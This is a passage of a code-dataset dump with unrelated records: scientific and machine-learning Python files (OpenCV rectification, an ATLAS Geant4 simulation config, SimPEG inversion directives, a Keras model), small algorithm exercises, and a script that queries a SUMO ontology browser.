(rotation matrix) for the second camera, brings points given in the unrectified second camera's coordinate system to points in the rectified second camera's coordinate system:\\n\", R2)\n\nprint(\"P1: projects points given in the rectified first camera coordinate system into the rectified first camera's image:\\n\", P1)\n\nprint(\"P2: projects points given in the rectified first camera coordinate system into the rectified second camera's image.:\\n\", P2)\n\n\n# essential_matrix_estimation\ncv2.imshow('leftImage', leftImage)\ncv2.imshow('rightImage', rightImage)\nplt.show()\n\n\n######################## initUndistortRectifyMap ########################\n\n\n# The function computes the joint undistortion and rectification transformation and represents the result in the form of maps for remap.\nmap1, map2 = cv2.initUndistortRectifyMap(\n K, distCoeffs, R1, P1, size=(600, 600), m1type=cv2.CV_32FC1)\n\nprint(\"map1 :\\n\", map1.shape)\n\nprint(\"map2 :\\n\", map2.shape)\n\ncv2.waitKey(0)\n","sub_path":"scripts/image_rectification.py","file_name":"image_rectification.py","file_ext":"py","file_size_in_byte":7470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"251346277","text":"class Solution:\n \"\"\"\n @param nums: an array of integers\n @return: the number of unique integers\n \"\"\"\n\n # O(nlog(n)) time, O(1) space\n def deduplication(self, nums):\n # write your code here\n if not nums:\n return 0\n\n count = 1\n nums.sort()\n\n for i in range(1, len(nums)):\n if nums[i - 1] != nums[i]:\n nums[count] = nums[i]\n count += 1\n\n return count\n\n # O(n) time and space\n # def deduplication(self, nums):\n # # write your code here\n # count = 0\n # hash_set = set()\n # for num in nums:\n # if num not in hash_set:\n # hash_set.add(num)\n # nums[count] = num\n # count += 1\n\n # return count","sub_path":"521_Remove Duplicate Numbers in Array.py","file_name":"521_Remove Duplicate Numbers in Array.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"68663431","text":"## Job options file for Geant4 Simulations\n\n## Algorithm sequence\nfrom AthenaCommon.AlgSequence import AlgSequence\njob = AlgSequence()\n\n## Output printout level\nServiceMgr.MessageSvc.OutputLevel = INFO\n\nfrom PerfMonComps.PerfMonFlags import jobproperties\njobproperties.PerfMonFlags.doMonitoring = True\n\n## Detector flags\nfrom AthenaCommon.DetFlags import DetFlags\nDetFlags.ID_setOn()\nDetFlags.Calo_setOn()\nDetFlags.Muon_setOff()\nDetFlags.Truth_setOn()\n\n## AthenaCommon flags\nfrom AthenaCommon.AthenaCommonFlags import athenaCommonFlags\nathenaCommonFlags.PoolHitsOutput.set_Off()\nif 'EvtMax' not in dir():\n EvtMax=150\nathenaCommonFlags.EvtMax = EvtMax\n\n## Set global conditions tag\nfrom AthenaCommon.GlobalFlags import globalflags\nglobalflags.ConditionsTag = \"OFLCOND-RUN12-SDR-19\"\n#globalflags.DetDescrVersion = 'ATLAS-R2-2015-03-01-00'\n\n## Simulation flags\nathenaCommonFlags.PoolEvgenInput.set_Off()\nathenaCommonFlags.SkipEvents.set_Off()\nfrom G4AtlasApps.SimFlags import simFlags\nsimFlags.load_atlas_flags()\nsimFlags.SimLayout.set_On()\nsimFlags.SimLayout='ATLAS-R2-2015-03-01-00_VALIDATION'\n\n## Enable the EtaPhi, VertexSpread and VertexRange checks\nsimFlags.EventFilter.set_On()\n\n## Use single particle generator\nimport AthenaCommon.AtlasUnixGeneratorJob\nimport ParticleGun as PG\npg = PG.ParticleGun(randomSvcName=simFlags.RandomSvc.get_Value(), randomStream=\"SINGLE\")\npg.sampler.pid = PG.CyclicSeqSampler([-211,211])\npg.sampler.mom = PG.PtEtaMPhiSampler(pt=50000, eta=[-4,4])\njob += pg\n\ninclude(\"G4AtlasApps/fragment.SimCopyWeights.py\")\n\n## Release GeoModel memory once sim is configured\nsimFlags.ReleaseGeoModel = False\n\ninclude(\"G4AtlasApps/G4Atlas.flat.configuration.py\")\n\n\n## Add the G4 sim to the alg sequence after the generator\nfrom AthenaCommon.CfgGetter import getAlgorithm\njob += getAlgorithm(\"G4AtlasAlg\",tryDefaultConfigurable=True)\n\n\n## User algorithms\nfrom AthenaCommon.AppMgr import ServiceMgr\nfrom GaudiSvc.GaudiSvcConf import THistSvc\nServiceMgr += THistSvc(\"THistSvc\")\n#ServiceMgr.THistSvc.Output = [\"atlasTest DATAFILE='atlasTest.muons.histo.root' OPT='RECREATE'\"];\n\nServiceMgr.THistSvc.Output = [\"truth DATAFILE='truth.root' OPT='RECREATE'\"];\n\nfrom AthenaCommon.AlgSequence import AlgSequence\njob = AlgSequence()\n\nfrom G4AtlasTests.G4AtlasTestsConf import G4TestAlg\njob += G4TestAlg()\nfrom AthenaCommon import CfgGetter\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"TruthTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"EvgenTruthTestTool\", checkType=True)] \njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"CaloEntryLayerTestTool\", checkType=True)] \njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"MuonEntryLayerTestTool\", checkType=True)] \njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"MuonExitLayerTestTool\", checkType=True)] \njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"PixelHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"SCT_HitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"TrtHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"EMBHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"EMECHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"FCALHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"HECHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"TileHitsTestTool\", checkType=True)]\njob.G4TestAlg.SimTestTools[\"TileHitsTestTool\"].TestMBTS=True\n#job.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"MDTHitsTestTool\", checkType=True)]\n#job.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"RPCHitsTestTool\", checkType=True)]\n#job.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"CSCHitsTestTool\", checkType=True)]\n#job.G4TestAlg.SimTestTools += [CfgGetter.getPrivateTool(\"TGCHitsTestTool\", checkType=True)]\n\n\n#job += AtlasTestAlg()\n\n# Control random number seeds so that daily runs are identical\nfrom G4AtlasAlg.G4AtlasAlgConf import G4AtlasAlg\ng4AtlasAlg = G4AtlasAlg()\ng4AtlasAlg.RandomGenerator = \"athena\"\nfrom AthenaCommon.AppMgr import ServiceMgr\nfrom AthenaServices.AthenaServicesConf import AtRndmGenSvc\natRndmGenSvc = AtRndmGenSvc()\natRndmGenSvc.Seeds += [\"AtlasG4 1234 5678\"]\natRndmGenSvc.Seeds += [\"SINGLE 2345 6789\"]\natRndmGenSvc.OutputLevel = WARNING\nServiceMgr += atRndmGenSvc\n\n## For saving seeds\n#from G4AtlasApps import AtlasG4Eng\n#pp = AtlasG4Eng.G4Eng.menu_G4RandomNrMenu()\n#pp.set_SaveOn()\n\n## Check of memory during the RTT tests\nfrom G4AtlasApps.atlas_utilities import MemorySnooper\njob += MemorySnooper()\n \nprintfunc (\"###MYOUTPUT###\" )\nprintfunc (ServiceMgr )\nprintfunc (\"###MYOUTPUT###\" )\nprintfunc (job )\n \nfrom AthenaCommon.ConfigurationShelve import saveToAscii \nsaveToAscii(\"config.txt\") \n","sub_path":"Simulation/G4Atlas/G4AtlasTests/share/test_AtlasG4_ParticleGun_pions.py","file_name":"test_AtlasG4_ParticleGun_pions.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"220964591","text":"import unittest\n\nimport numpy as np\nfrom numpy.testing import assert_array_equal\n\nfrom mlpipe.test.helpers import data as helper_data\nfrom mlpipe.processors.interpolation import Interpolation\nfrom mlpipe.processors.standard_data_format import StandardDataFormat\n\n\nclass TestInterpolation(unittest.TestCase):\n def test_standardcase(self):\n data = np.array([\n [13, 20],\n [14, 21],\n [np.nan, 22],\n [16, np.nan],\n [17, np.nan],\n [np.nan, np.nan],\n [19, np.nan],\n [20, 27],\n ], dtype=\"float\")\n data.flags.writeable = False\n\n result_expected = np.array([\n [13, 20],\n [14, 21],\n [15, 22],\n [16, 23],\n [17, 24],\n [18, 25],\n [19, np.nan],\n [20, 27],\n ], dtype=\"float\")\n result_expected.flags.writeable = False\n\n result = Interpolation(max_consecutive_interpolated_value=3)._process2d(\n StandardDataFormat(labels=['a', 'b'], data=data, timestamps=helper_data.generate_timestamps(samples=8))\n )\n assert_array_equal(result_expected, result.data)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"mlpipe/test/processors/test_interpolation.py","file_name":"test_interpolation.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"133556334","text":"#数据可视化\n#获取数据\nfrom matplotlib import pyplot as plt\nimport csv\nfilename = 'F:\\learnpy\\python编程入门\\sitka_weather_07-2014.csv'\n#打开文件\nwith open(filename) as f:\n #读取文件\n reader = csv.reader(f)\n #读取第一行,即头文件\n head_row = next(reader)\n #如果不使用next,后面将会对所有行遍历,使用了next,遍历会忽略第一行\n #获取数据\n max_t = []\n for ro in reader:\n max_t.append(int(ro[1]))\n#绘图\n#设置窗口大小\nfig = plt.figure(dpi=128,figsize=(10,6))\n#传入数据\nplt.plot(max_t,c='red')\n#图表标题\nplt.title('Daily high temperatures,July 2014',fontsize=24)\n#设置横坐标标题\nplt.xlabel('',fontsize=16)\n#设置纵坐标\nplt.ylabel('Max Temperature',fontsize=16)\n#设置刻度\nplt.tick_params(axis='both',which='major',labelsize=16)\n#展示图表\nplt.show()","sub_path":"python编程入门/16sitka_weather.py","file_name":"16sitka_weather.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"501783980","text":"from tensorflow import keras\n\nimport numpy as np\nimport tensorflow as tf\n\n\nclass SReFT(keras.Model):\n\n def __init__(self,\n output_dim=4,\n latent_dim=32,\n activation='tanh',\n random_state=None):\n\n super(SReFT, self).__init__()\n\n self.random_state = random_state\n tf.random.set_seed(random_state)\n np.random.seed(random_state)\n\n self.activation = activation\n self.output_dim = int(output_dim)\n self.latent_dim = int(latent_dim)\n self.tracker_tr = keras.metrics.Mean()\n self.tracker_va = keras.metrics.Mean()\n\n self.lnvar_y = tf.Variable(tf.zeros(self.output_dim))\n\n self.model_1 = keras.Sequential([\n keras.layers.Dense(self.latent_dim, activation=self.activation),\n keras.layers.Dense(self.latent_dim, activation=self.activation),\n keras.layers.Dense(1, activation=tf.nn.relu),])\n # keras.layers.Dense(1, activation=tf.keras.layers.LeakyReLU(alpha=0.1)),])\n\n self.model_y = keras.Sequential([\n keras.layers.Dense(self.latent_dim, activation=self.activation),\n keras.layers.Dense(self.latent_dim, activation=self.activation),\n keras.layers.Dense(self.latent_dim, activation=self.activation),\n keras.layers.Dense(self.latent_dim, activation=self.activation),\n keras.layers.Dense(self.output_dim, activation=None),])\n\n return None\n\n def call(self, inputs, training=False):\n (input1, input2) = inputs\n offset = self.model_1(input1, training=training)\n input2 = tf.concat((input2[:, :, :1] + offset, input2[:, :, 1:]), axis=-1)\n y_pred = self.model_y(input2, training=training)\n return y_pred\n\n def train_step(self, batch):\n inputs, y_true = batch\n with tf.GradientTape() as tape:\n y_pred = self(inputs, training=True)\n y_loss = self.compute_negative_log_likelihood(y_true, y_pred)\n objval = tf.reduce_sum(y_loss)\n grads = tape.gradient(objval, self.trainable_weights)\n self.optimizer.apply_gradients(zip(grads, self.trainable_weights))\n self.tracker_tr.update_state(y_loss)\n return {'loss': self.tracker_tr.result(),}\n\n def test_step(self, batch):\n inputs, y_true = batch\n y_pred = self(inputs, training=False)\n y_loss = self.compute_negative_log_likelihood(y_true, y_pred)\n self.tracker_va.update_state(y_loss)\n return {'loss': self.tracker_va.result(),}\n\n def compute_negative_log_likelihood(self, y_true, y_pred):\n is_nan = tf.math.is_nan(y_true)\n y_true = tf.where(is_nan, tf.zeros_like(y_true), y_true)\n y_pred = tf.where(is_nan, tf.zeros_like(y_pred), y_pred)\n neg_ll = self.lnvar_y + tf.pow(y_true - y_pred, 2) / tf.exp(self.lnvar_y)\n neg_ll = tf.where(is_nan, tf.zeros_like(neg_ll), neg_ll)\n return tf.reduce_sum(neg_ll, axis=(1, 2))\n\n\n\nclass DummyTransformer():\n\n def __init__(self,):\n return None\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n return X\n\n def inverse_transform(self, X, y=None):\n return X\n\n def fit_transform(self, X, y=None):\n return X\n","sub_path":"sreft.py","file_name":"sreft.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"230134651","text":"\"\"\"\nsource:leetcode\nGiven a string s, find the length of the longest substring without repeating characters.\nExample 1:\nInput: s = \"abcabcbb\"\nOutput: 3\nExplanation: The answer is \"abc\", with the length of 3.\n\"\"\"\ndef longestNonRepeatingSubString(s:str)-> int:\n char_dict={}\n start=0\n max_length=0\n for ind,character in enumerate(s):\n if character in char_dict and start <= char_dict[character]:\n start = char_dict[character]+1\n \n else:\n max_length=max(max_length,ind-start+1)\n char_dict[character]=ind\n \n return max_length\n\n#--- Driver Codee ---#\ns= input(\"Enter string: \").strip()\nprint(longestNonRepeatingSubString(s))","sub_path":"longestNonRepeatingSubstring.py","file_name":"longestNonRepeatingSubstring.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"399976343","text":"from __future__ import print_function\nfrom . import Utils\nimport numpy as np\n\nclass InversionDirective(object):\n \"\"\"InversionDirective\"\"\"\n\n debug = False #: Print debugging information\n\n def __init__(self, **kwargs):\n Utils.setKwargs(self, **kwargs)\n\n @property\n def inversion(self):\n \"\"\"This is the inversion of the InversionDirective instance.\"\"\"\n return getattr(self,'_inversion',None)\n @inversion.setter\n def inversion(self, i):\n if getattr(self,'_inversion',None) is not None:\n print('Warning: InversionDirective {0!s} has switched to a new inversion.'.format(self.__name__))\n self._inversion = i\n\n @property\n def invProb(self): return self.inversion.invProb\n @property\n def opt(self): return self.invProb.opt\n @property\n def reg(self): return self.invProb.reg\n @property\n def dmisfit(self): return self.invProb.dmisfit\n @property\n def survey(self): return self.dmisfit.survey\n @property\n def prob(self): return self.dmisfit.prob\n\n def initialize(self):\n pass\n\n def endIter(self):\n pass\n\n def finish(self):\n pass\n\nclass DirectiveList(object):\n\n dList = None #: The list of Directives\n\n def __init__(self, *directives, **kwargs):\n self.dList = []\n for d in directives:\n assert isinstance(d, InversionDirective), 'All directives must be InversionDirectives not {0!s}'.format(d.__name__)\n self.dList.append(d)\n Utils.setKwargs(self, **kwargs)\n\n @property\n def debug(self):\n return getattr(self, '_debug', False)\n @debug.setter\n def debug(self, value):\n for d in self.dList:\n d.debug = value\n self._debug = value\n\n @property\n def inversion(self):\n \"\"\"This is the inversion of the InversionDirective instance.\"\"\"\n return getattr(self,'_inversion',None)\n @inversion.setter\n def inversion(self, i):\n if self.inversion is i: return\n if getattr(self,'_inversion',None) is not None:\n print('Warning: {0!s} has switched to a new inversion.'.format(self.__name__))\n for d in self.dList:\n d.inversion = i\n self._inversion = i\n\n def call(self, ruleType):\n if self.dList is None:\n if self.debug: 'DirectiveList is None, no directives to call!'\n return\n\n directives = ['initialize', 'endIter', 'finish']\n assert ruleType in directives, 'Directive type must be in [\"{0!s}\"]'.format('\", \"'.join(directives))\n for r in self.dList:\n getattr(r, ruleType)()\n\n\nclass BetaEstimate_ByEig(InversionDirective):\n \"\"\"BetaEstimate\"\"\"\n\n beta0 = None #: The initial Beta (regularization parameter)\n beta0_ratio = 1e2 #: estimateBeta0 is used with this ratio\n\n def initialize(self):\n \"\"\"\n The initial beta is calculated by comparing the estimated\n eigenvalues of JtJ and WtW.\n\n To estimate the eigenvector of **A**, we will use one iteration\n of the *Power Method*:\n\n .. math::\n\n \\mathbf{x_1 = A x_0}\n\n Given this (very course) approximation of the eigenvector,\n we can use the *Rayleigh quotient* to approximate the largest eigenvalue.\n\n .. math::\n\n \\lambda_0 = \\\\frac{\\mathbf{x^\\\\top A x}}{\\mathbf{x^\\\\top x}}\n\n We will approximate the largest eigenvalue for both JtJ and WtW, and\n use some ratio of the quotient to estimate beta0.\n\n .. math::\n\n \\\\beta_0 = \\gamma \\\\frac{\\mathbf{x^\\\\top J^\\\\top J x}}{\\mathbf{x^\\\\top W^\\\\top W x}}\n\n :rtype: float\n :return: beta0\n \"\"\"\n\n if self.debug: print('Calculating the beta0 parameter.')\n\n m = self.invProb.curModel\n f = self.invProb.getFields(m, store=True, deleteWarmstart=False)\n\n x0 = np.random.rand(*m.shape)\n t = x0.dot(self.dmisfit.eval2Deriv(m,x0,f=f))\n b = x0.dot(self.reg.eval2Deriv(m, v=x0))\n self.beta0 = self.beta0_ratio*(t/b)\n\n self.invProb.beta = self.beta0\n\n\nclass BetaSchedule(InversionDirective):\n \"\"\"BetaSchedule\"\"\"\n\n coolingFactor = 8.\n coolingRate = 3\n\n def endIter(self):\n if self.opt.iter > 0 and self.opt.iter % self.coolingRate == 0:\n if self.debug: print('BetaSchedule is cooling Beta. Iteration: {0:d}'.format(self.opt.iter))\n self.invProb.beta /= self.coolingFactor\n\n\nclass TargetMisfit(InversionDirective):\n\n chifact = 1.\n phi_d_star = None\n\n @property\n def target(self):\n if getattr(self, '_target', None) is None:\n if self.phi_d_star is None:\n self.phi_d_star = 0.5 * self.survey.nD\n self._target = self.chifact * self.phi_d_star # the factor of 0.5 is because we do phid = 0.5*|| dpred - dobs||^2\n return self._target\n @target.setter\n def target(self, val):\n self._target = val\n\n def endIter(self):\n if self.invProb.phi_d < self.target:\n self.opt.stopNextIteration = True\n\n\n\nclass SaveEveryIteration(InversionDirective):\n @property\n def name(self):\n if getattr(self, '_name', None) is None:\n self._name = 'InversionModel'\n return self._name\n @name.setter\n def name(self, value):\n self._name = value\n\n @property\n def fileName(self):\n if getattr(self, '_fileName', None) is None:\n from datetime import datetime\n self._fileName = '{0!s}-{1!s}'.format(self.name, datetime.now().strftime('%Y-%m-%d-%H-%M'))\n return self._fileName\n @fileName.setter\n def fileName(self, value):\n self._fileName = value\n\n\nclass SaveModelEveryIteration(SaveEveryIteration):\n \"\"\"SaveModelEveryIteration\"\"\"\n\n def initialize(self):\n print(\"SimPEG.SaveModelEveryIteration will save your models as: '###-{0!s}.npy'\".format(self.fileName))\n\n def endIter(self):\n np.save('{0:03d}-{1!s}'.format(self.opt.iter, self.fileName), self.opt.xc)\n\n\nclass SaveOutputEveryIteration(SaveEveryIteration):\n \"\"\"SaveModelEveryIteration\"\"\"\n\n def initialize(self):\n print(\"SimPEG.SaveOutputEveryIteration will save your inversion progress as: '###-{0!s}.txt'\".format(self.fileName))\n f = open(self.fileName+'.txt', 'w')\n f.write(\" # beta phi_d phi_m f\\n\")\n f.close()\n\n def endIter(self):\n f = open(self.fileName+'.txt', 'a')\n f.write(' {0:3d} {1:1.4e} {2:1.4e} {3:1.4e} {4:1.4e}\\n'.format(self.opt.iter, self.invProb.beta, self.invProb.phi_d, self.invProb.phi_m, self.opt.f))\n f.close()\n\n\nclass SaveOutputDictEveryIteration(SaveEveryIteration):\n \"\"\"\n Saves inversion parameters at every iteraion.\n\n\n \"\"\"\n\n def initialize(self):\n print(\"SimPEG.SaveOutputDictEveryIteration will save your inversion progress as dictionary: '###-{0!s}.npz'\".format(self.fileName))\n\n def endIter(self):\n\n # Initialize the output dict\n outDict = {}\n # Save the data.\n outDict['iter'] = self.opt.iter\n outDict['beta'] = self.invProb.beta\n outDict['phi_d'] = self.invProb.phi_d\n outDict['phi_m'] = self.invProb.phi_m\n outDict['phi_ms'] = self.reg._evalSmall(self.invProb.curModel)\n outDict['phi_mx'] = self.reg._evalSmoothx(self.invProb.curModel)\n outDict['phi_my'] = self.reg._evalSmoothy(self.invProb.curModel) if self.prob.mesh.dim >= 2 else 'NaN'\n outDict['phi_mz'] = self.reg._evalSmoothz(self.invProb.curModel) if self.prob.mesh.dim==3 else 'NaN'\n outDict['f'] = self.opt.f\n outDict['m'] = self.invProb.curModel\n outDict['dpred'] = self.invProb.dpred\n\n # Save the file as a npz\n np.savez('{:03d}-{:s}'.format(self.opt.iter,self.fileName), outDict)\n\n\nclass Update_IRLS(InversionDirective):\n\n eps_min = None\n eps = None\n norms = [2.,2.,2.,2.]\n factor = None\n gamma = None\n phi_m_last = None\n phi_d_last = None\n f_old = None\n f_min_change = 1e-2\n beta_tol = 5e-2\n prctile = 95\n\n # Solving parameter for IRLS (mode:2)\n IRLSiter = 0\n minGNiter = 5\n maxIRLSiter = 10\n iterStart = 0\n\n # Beta schedule\n coolingFactor = 2.\n coolingRate = 1\n\n mode = 1\n\n @property\n def target(self):\n if getattr(self, '_target', None) is None:\n self._target = self.survey.nD*0.5\n return self._target\n @target.setter\n def target(self, val):\n self._target = val\n\n def initialize(self):\n\n if self.mode == 1:\n self.reg.norms = [2., 2., 2., 2.]\n\n def endIter(self):\n\n # After reaching target misfit with l2-norm, switch to IRLS (mode:2)\n if self.invProb.phi_d < self.target and self.mode == 1:\n print(\"Convergence with smooth l2-norm regularization: Start IRLS steps...\")\n\n self.mode = 2\n\n # Either use the supplied epsilon, or fix base on distribution of\n # model values\n if getattr(self, 'eps', None) is None:\n self.reg.eps_p = np.percentile(np.abs(self.invProb.curModel),self.prctile)\n else:\n self.reg.eps_p = self.eps[0]\n\n if getattr(self, 'eps', None) is None:\n\n self.reg.eps_q = np.percentile(np.abs(self.reg.regmesh.cellDiffxStencil*(self.reg.mapping * self.invProb.curModel)),self.prctile)\n else:\n self.reg.eps_q = self.eps[1]\n\n self.reg.norms = self.norms\n self.coolingFactor = 1.\n self.coolingRate = 1\n self.iterStart = self.opt.iter\n self.phi_d_last = self.invProb.phi_d\n self.phi_m_last = self.invProb.phi_m_last\n\n self.reg.l2model = self.invProb.curModel\n self.reg.curModel = self.invProb.curModel\n\n print(\"L[p qx qy qz]-norm : \" + str(self.reg.norms))\n print(\"eps_p: \" + str(self.reg.eps_p) + \" eps_q: \" + str(self.reg.eps_q))\n\n if getattr(self, 'f_old', None) is None:\n self.f_old = self.reg.eval(self.invProb.curModel)#self.invProb.evalFunction(self.invProb.curModel, return_g=False, return_H=False)\n\n # Beta Schedule\n if self.opt.iter > 0 and self.opt.iter % self.coolingRate == 0:\n if self.debug: print('BetaSchedule is cooling Beta. Iteration: {0:d}'.format(self.opt.iter))\n self.invProb.beta /= self.coolingFactor\n\n\n # Only update after GN iterations\n if (self.opt.iter-self.iterStart) % self.minGNiter == 0 and self.mode==2:\n\n self.IRLSiter += 1\n\n phim_new = self.reg.eval(self.invProb.curModel)\n self.f_change = np.abs(self.f_old - phim_new) / self.f_old\n\n print(\"Regularization decrease: {0:6.3e}\".format((self.f_change)))\n\n # Check for maximum number of IRLS cycles\n if self.IRLSiter == self.maxIRLSiter:\n print(\"Reach maximum number of IRLS cycles: {0:d}\".format(self.maxIRLSiter))\n self.opt.stopNextIteration = True\n return\n\n # Check if the function has changed enough\n if self.f_change < self.f_min_change and self.IRLSiter > 1:\n print(\"Minimum decrease in regularization. End of IRLS\")\n self.opt.stopNextIteration = True\n return\n else:\n self.f_old = phim_new\n\n# # Cool the threshold parameter if required\n# if getattr(self, 'factor', None) is not None:\n# eps = self.reg.eps / self.factor\n#\n# if getattr(self, 'eps_min', None) is not None:\n# self.reg.eps = np.max([self.eps_min,eps])\n# else:\n# self.reg.eps = eps\n\n # Get phi_m at the end of current iteration\n self.phi_m_last = self.invProb.phi_m_last\n\n # Reset the regularization matrices so that it is\n # recalculated for current model\n self.reg._Wsmall = None\n self.reg._Wx = None\n self.reg._Wy = None\n self.reg._Wz = None\n\n # Update the model used for the IRLS weights\n self.reg.curModel = self.invProb.curModel\n\n # Temporarely set gamma to 1. to get raw phi_m\n self.reg.gamma = 1.\n\n # Compute new model objective function value\n phim_new = self.reg.eval(self.invProb.curModel)\n\n # Update gamma to scale the regularization between IRLS iterations\n self.reg.gamma = self.phi_m_last / phim_new\n\n # Reset the regularization matrices again for new gamma\n self.reg._Wsmall = None\n self.reg._Wx = None\n self.reg._Wy = None\n self.reg._Wz = None\n\n # Check if misfit is within the tolerance, otherwise scale beta\n val = self.invProb.phi_d / (self.survey.nD*0.5)\n\n if np.abs(1.-val) > self.beta_tol:\n self.invProb.beta = self.invProb.beta * self.survey.nD*0.5 / self.invProb.phi_d\n\nclass Update_lin_PreCond(InversionDirective):\n \"\"\"\n Create a Jacobi preconditioner for the linear problem\n \"\"\"\n onlyOnStart=False\n\n def initialize(self):\n\n if getattr(self.opt, 'approxHinv', None) is None:\n # Update the pre-conditioner\n diagA = np.sum(self.prob.G**2.,axis=0) + self.invProb.beta*(self.reg.W.T*self.reg.W).diagonal() #* (self.reg.mapping * np.ones(self.reg.curModel.size))**2.\n PC = Utils.sdiag((self.prob.mapping.deriv(None).T *diagA)**-1.)\n self.opt.approxHinv = PC\n\n def endIter(self):\n # Cool the threshold parameter\n if self.onlyOnStart==True:\n return\n\n if getattr(self.opt, 'approxHinv', None) is not None:\n # Update the pre-conditioner\n diagA = np.sum(self.prob.G**2.,axis=0) + self.invProb.beta*(self.reg.W.T*self.reg.W).diagonal() #* (self.reg.mapping * np.ones(self.reg.curModel.size))**2.\n PC = Utils.sdiag((self.prob.mapping.deriv(None).T *diagA)**-1.)\n self.opt.approxHinv = PC\n\n\nclass Update_Wj(InversionDirective):\n \"\"\"\n Create approx-sensitivity base weighting using the probing method\n \"\"\"\n k = None # Number of probing cycles\n itr = None # Iteration number to update Wj, or always update if None\n\n def endIter(self):\n\n if self.itr is None or self.itr == self.opt.iter:\n\n m = self.invProb.curModel\n if self.k is None:\n self.k = int(self.survey.nD/10)\n\n def JtJv(v):\n\n Jv = self.prob.Jvec(m, v)\n\n return self.prob.Jtvec(m,Jv)\n\n JtJdiag = Utils.diagEst(JtJv,len(m),k=self.k)\n JtJdiag = JtJdiag / max(JtJdiag)\n\n self.reg.wght = JtJdiag\n","sub_path":"SimPEG/Directives.py","file_name":"Directives.py","file_ext":"py","file_size_in_byte":14842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"391742462","text":"from xmlrpc.client import Server, ServerProxy\nimport requests\nimport bs4\n\nSUMO_TERM = \"http://54.183.42.206:8080/sigma/Browse.jsp?flang=SUO-KIF&lang=EnglishLanguage&kb=SUMO&term\" \\\n \"={term}\"\n\nTERM_SUBCLASS = \"http://54.183.42.206:8080/sigma/Intersect.jsp?kb=SUMO&lang=EnglishLanguage&term1={term}&term2\" \\\n \"=subclass&submit=submit\"\n\ndef get(term): return requests.get(\"http://54.183.42.206:8080/sigma/Browse.jsp?flang=SUO-KIF&lang=EnglishLanguage&kb\"\n \"=SUMO&term={term}\".format(term=term))\n\ndef stringify(html): return list(bs4.BeautifulSoup(html).strings)\n\n\ndef _get(term): return requests.get(\"http://54.183.42.206:8080/sigma/Intersect.jsp?kb=SUMO&lang=EnglishLanguage&term1\"\n \"={term}&term2=instance&submit=submit\".format(term=term))\n\n\n\n\n\nSYN = \"{site}{jsp}\" + \"?\" + \"synset={offset}&kb={kb}&flang={flang}&lang={lang}&kb={kb}\".format(\n\tsite = 'http://54.183.42.206:8080/sigma/',\n\tjsp = 'WordNet.jsp', offset='107493527',\n\tkb='SUMO', lang='EnglishLanguage',\n\tflang='SUO-KIF')\n\nEmotionalState = \"{site}{jsp}\"+ \"?\"+ \"flang={flang}&lang={lang}&kb={kb}&term={term}\".format(\n\tsite='http://54.183.42.206:8080/sigma/',\n\tflang='SUO-KIF',\n\tjsp ='Browse.jsp',\n\tterm='EmotionalState',\n\tlang='EnglishLanguage',\n\tkb='SUMO')\n\n\n\nES1 = \"{site}{jsp}\"+\"?\"+\"term={term}&lang={lang}&flang={flang}&kb={kb}&start=25&arg=2&type=arg\".format(\n\tsite='http://54.183.42.206:8080/sigma/', jsp ='BrowseExtra.jsp',\n\tflang='SUO-KIF', term='EmotionalState',lang='EnglishLanguage',\n\tkb='SUMO')\n\nOrgan_subclass = \"{site}{jsp}\"+\"?\"+\"kb={kb}&lang={lang}&flang={flang}&term1={term1}\".format(\n\tsite='http://54.183.42.206:8080/sigma/', jsp ='Intersect.jsp',\n\tkb='SUMO', lang='EnglishLanguage', flang='SUO-KIF', term1='Organ')\n\nOrgan_doc = \"{site}{jsp}\"+\"?\"+\"kb={kb}&lang={lang}&term1={term1}&term2={term2}&submit=submit\".format(\n\tsite='http://54.183.42.206:8080/sigma/', kb='SUMO', jsp='Intersect.jsp',\n\tlang='EnglishLanguage', term1='Organ', term2='documentation')\n\nES_domain = \"{site}{jsp}\"+ \"?\" + \"kb={kb}&lang={lang}&term1={term1}&term2={term2}&submit=submit\".format(\n\tsite='http://54.183.42.206:8080/sigma/', kb='SUMO', jsp='Intersect.jsp',\n\tlang='EnglishLanguage', term1='EmotionalState', term2='domain')\n\nSAA_disjoint = \"{site}{jsp}\"+ \"?\"+ \"kb={kb}&lang={lang}&term1={term1} 